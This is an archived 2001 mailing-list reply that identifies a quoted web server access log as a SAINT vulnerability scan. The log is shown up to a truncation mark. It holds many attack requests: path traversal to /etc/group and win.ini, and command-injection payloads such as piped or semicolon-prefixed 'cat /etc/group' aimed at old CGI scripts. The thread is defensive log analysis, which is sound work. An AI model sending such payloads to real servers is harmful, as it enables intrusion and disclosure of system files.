This appears to be a scan by SAINT; its web site is www.wwdsi.com. --- jamie rishaw <jamieat_private> wrote: > Hardcore scan of our web server.. Does this look > familiar to anyone? > > [ LOG :: ] > > 69warp87.newtel.com - - [14/Aug/2001:12:56:16 -0400] > "QUIT" 501 - > 69warp87.newtel.com - - [14/Aug/2001:13:06:18 -0400] > "QUIT" 401 - > 69warp87.newtel.com - - [14/Aug/2001:13:07:35 -0400] > "GET /n0nexi5tent_fi1e.html HTTP/1.0" 401 468 > 69warp87.newtel.com - - [14/Aug/2001:13:07:35 -0400] > "GET /n0nexi5tent_fi1e.html HTTP/1.0" 401 468 > 69warp87.newtel.com - - [14/Aug/2001:13:07:36 -0400] > "GET / HTTP/1.0" 401 468 > 69warp87.newtel.com - - [14/Aug/2001:13:07:36 -0400] > "GET /%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/etc/group > HTTP/1.0" 400 371 > 69warp87.newtel.com - - [14/Aug/2001:13:07:36 -0400] > "GET > /%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/winnt/win.ini > HTTP/1.0" 400 > 375 > 69warp87.newtel.com - - [14/Aug/2001:13:07:37 -0400] > "GET /../../../../../etc/group HTTP/1.0" 400 351 > 69warp87.newtel.com - - [14/Aug/2001:13:07:37 -0400] > "GET /../../../../../winnt/win.ini HTTP/1.0" 400 355 > 69warp87.newtel.com - - [14/Aug/2001:13:07:37 -0400] > "GET /../../../../..winnt/win.ini HTTP/1.0" 400 354 > 69warp87.newtel.com - - [14/Aug/2001:13:07:37 -0400] > "GET /.../.../.../.../.../etc/group HTTP/1.0" 401 > 468 > 69warp87.newtel.com - - [14/Aug/2001:13:07:38 -0400] > "GET /.../.../.../.../.../winnt/win.ini HTTP/1.0" > 401 468 > 69warp87.newtel.com - - [14/Aug/2001:13:07:38 -0400] > "GET /../../../../../etc/group HTTP/1.0" 400 351 > 69warp87.newtel.com - - [14/Aug/2001:13:07:38 -0400] > "GET /../../../../../winnt/win.ini HTTP/1.0" 400 355 > 69warp87.newtel.com - - [14/Aug/2001:13:07:38 -0400] > "GET > /cgi-bin/webdist.cgi?distloc=;/bin/cat%20/etc/group > HTTP/1.0" 40 > 4 284 > 69warp87.newtel.com - - [14/Aug/2001:13:07:39 -0400] > "GET /cgi-bin/campas?%0acat%0a/etc/group%0a > HTTP/1.0" 404 279 > 69warp87.newtel.com - - [14/Aug/2001:13:07:39 -0400] > "GET
/cgi-bin/htmlscript?../../../../../../etc/group > HTTP/1.0" 404 28 > 3 > 69warp87.newtel.com - - [14/Aug/2001:13:07:39 -0400] > "GET /cgi-bin/php.cgi?/etc/group HTTP/1.0" 404 280 > 69warp87.newtel.com - - [14/Aug/2001:13:07:39 -0400] > "GET /cgi-bin/pfdispaly?../../../../../../etc/group > HTTP/1.0" 404 282 > 69warp87.newtel.com - - [14/Aug/2001:13:07:40 -0400] > "GET > /cgi-bin/pfdispaly.cgi?../../../../../../etc/group > HTTP/1.0" 404 > 286 > 69warp87.newtel.com - - [14/Aug/2001:13:07:40 -0400] > "GET > /cgi-bin/view-source?../../../../../../etc/group > HTTP/1.0" 404 2 > 84 > 69warp87.newtel.com - - [14/Aug/2001:13:07:40 -0400] > "GET /cgi-bin/htsearch?exclude=%60/etc/group%60 > HTTP/1.0" 404 > 281 > 69warp87.newtel.com - - [14/Aug/2001:13:07:41 -0400] > "GET > /cgi-bin/infosrch.cgi?cmd=getdoc&db=man&fname=|/bin/cat%20/etc/g > roup HTTP/1.0" 404 285 > 69warp87.newtel.com - - [14/Aug/2001:13:07:41 -0400] > "GET /cgi-bin/faxsurvey?/bin/cat%20/etc/group > HTTP/1.0" 404 282 > 69warp87.newtel.com - - [14/Aug/2001:13:07:41 -0400] > "GET /cgi-bin/counterfiglet/nc/f=;cat%20/etc/group > HTTP/1.0" 404 307 > 69warp87.newtel.com - - [14/Aug/2001:13:07:41 -0400] > "GET > /cgi-bin/calendar_admin.pl?config=|cat%20/etc/group| > HTTP/1.0" 4 > 04 290 > 69warp87.newtel.com - - [14/Aug/2001:13:07:42 -0400] > "GET > /cgi-bin/calendar/calendar_admin.pl?config=|cat%20/etc/group| > HT > TP/1.0" 404 299 > 69warp87.newtel.com - - [14/Aug/2001:13:07:42 -0400] > "GET > /cgi-bin/pollit/Poll_It_SSI_v2.0.cgi?data_dir=/etc/group%00 > HTTP > /1.0" 404 300 > 69warp87.newtel.com - - [14/Aug/2001:13:07:42 -0400] > "GET > /cgi-bin/bb-hostsvc.sh?HOSTSVC=/../../../../../../../../etc/grou > p HTTP/1.0" 404 286 > 69warp87.newtel.com - - [14/Aug/2001:13:07:42 -0400] > "GET > /cgi-bin/netauth.cgi?cmd=show&page=../../../../../../../../../et > c/group HTTP/1.0" 404 284 > 69warp87.newtel.com - - [14/Aug/2001:13:07:43 -0400] > "GET /cgi-bin/htgrep?file=index.html&hdr=/etc/group > HTTP/1.0" 404 279 > 
69warp87.newtel.com - - [14/Aug/2001:13:07:43 -0400] > "GET > /cgi-bin/YaBB.pl?board=news&action=display&num=../../../../../.. > /../../etc/group%00 HTTP/1.0" 404 280 > 69warp87.newtel.com - - [14/Aug/2001:13:07:43 -0400] > "GET > /search97cgi/vtopic?action=view&ViewTemplate=../../../../../etc/ > group HTTP/1.0" 401 468 > 69warp87.newtel.com - - [14/Aug/2001:13:07:44 -0400] > "GET /cgi-bin/multihtml.pl?multi=/etc/group%00html > HTTP/1.0" 404 285 > 69warp87.newtel.com - - [14/Aug/2001:13:07:44 -0400] > "GET /cgi-bin/query?mss=../config HTTP/1.0" 404 278 > 69warp87.newtel.com - - [14/Aug/2001:13:07:44 -0400] > "GET > /cgi-bin/ssi//%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/group > HTTP/1.0" 40 > 0 377 > 69warp87.newtel.com - - [14/Aug/2001:13:07:44 -0400] > "GET /cgi-bin/webplus?script=/../../../../etc/group > HTTP/1.0" 404 280 > 69warp87.newtel.com - - [14/Aug/2001:13:07:45 -0400] > "GET > /cgi-bin/webplus.exe?script=/../../../../etc/group > HTTP/1.0" 404 > 284 > 69warp87.newtel.com - - [14/Aug/2001:13:07:45 -0400] > "GET > /cgi-bin/webplus.cgi?script=/../../../../etc/group > HTTP/1.0" 404 > 284 > 69warp87.newtel.com - - [14/Aug/2001:13:07:45 -0400] > "GET > /cgi-bin/mmstdod.cgi?ALTERNATE_TEMPLATES=|%20echo%20Content-Type > :%20text%2Fhtml%3Becho%20%20%3B%20cat%20%2Fetc%2Fgroup%00 > HTTP/1.0" 404 284 > 69warp87.newtel.com - - [14/Aug/2001:13:07:46 -0400] > "GET > /cgi-bin/bbs_forum.cgi?read=../../../../etc/group > HTTP/1.0" 404 > 286 > 69warp87.newtel.com - - [14/Aug/2001:13:07:46 -0400] > "GET > /cgi-bin/bbs/bbs_forum.cgi?read=../../../../etc/group > HTTP/1.0" > 404 290 > 69warp87.newtel.com - - [14/Aug/2001:13:07:46 -0400] > "GET /cgi-bin/man-cgi?%20/etc/group%20 HTTP/1.0" 404 > 280 > 69warp87.newtel.com - - [14/Aug/2001:13:07:46 -0400] > "GET /opendir.php?requesturl=/etc/group HTTP/1.0" > 401 468 > 69warp87.newtel.com - - [14/Aug/2001:13:07:47 -0400] > "GET > /bb_smilies.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4 > vZXRjL2dyb3VwAAo HTTP/1.0" 401 468 > 
69warp87.newtel.com - - [14/Aug/2001:13:07:47 -0400] > "GET > /cgi-bin/talkback.cgi?article=../../../../../etc/group%00&action > =view&matchview=1 HTTP/1.0" 404 285 > 69warp87.newtel.com - - [14/Aug/2001:13:07:47 -0400] > "GET > /cgi-bin/cal_make.pl?p0=../../../../../etc/group%00 > HTTP/1.0" 40 > 4 284 > 69warp87.newtel.com - - [14/Aug/2001:13:07:47 -0400] > "GET > /cgi-bin/a1stats/a1disp3.cgi?../../../../../../../etc/group > HTTP > /1.0" 404 292 > 69warp87.newtel.com - - [14/Aug/2001:13:07:48 -0400] > "GET /cgi-bin/test-cgi HTTP/1.0" 403 285 > 69warp87.newtel.com - - [14/Aug/2001:13:07:48 -0400] > "GET /cgi-bin/dumpenv.pl HTTP/1.0" 404 283 > 69warp87.newtel.com - - [14/Aug/2001:13:07:48 -0400] > "GET /cgi-bin/nph-test-cgi HTTP/1.0" 404 285 > 69warp87.newtel.com - - [14/Aug/2001:13:07:49 -0400] > "GET /cgi-bin/wwwboard.pl HTTP/1.0" 404 284 > 69warp87.newtel.com - - [14/Aug/2001:13:07:52 -0400] > "GET /cgi-bin/wwwboard.cgi HTTP/1.0" 404 285 > 69warp87.newtel.com - - [14/Aug/2001:13:07:52 -0400] > "GET /cgi-bin/wwwboard HTTP/1.0" 404 281 > 69warp87.newtel.com - - [14/Aug/2001:13:07:53 -0400] > "GET /cgi-bin/wrap HTTP/1.0" 404 277 > 69warp87.newtel.com - - [14/Aug/2001:13:07:53 -0400] > "GET /cgi-bin/wrap.pl HTTP/1.0" 404 280 > 69warp87.newtel.com - - [14/Aug/2001:13:07:53 -0400] > "GET /cgi-bin/wrap.cgi HTTP/1.0" 404 281 > 69warp87.newtel.com - - [14/Aug/2001:13:07:53 -0400] > "GET /cgi-bin/finger HTTP/1.0" 404 279 > 69warp87.newtel.com - - [14/Aug/2001:13:07:54 -0400] > "GET /cgi-bin/finger.pl HTTP/1.0" 404 282 > 69warp87.newtel.com - - [14/Aug/2001:13:07:54 -0400] > "GET /cgi-bin/finger.cgi HTTP/1.0" 404 283 > 69warp87.newtel.com - - [14/Aug/2001:13:07:54 -0400] > "GET === message truncated ===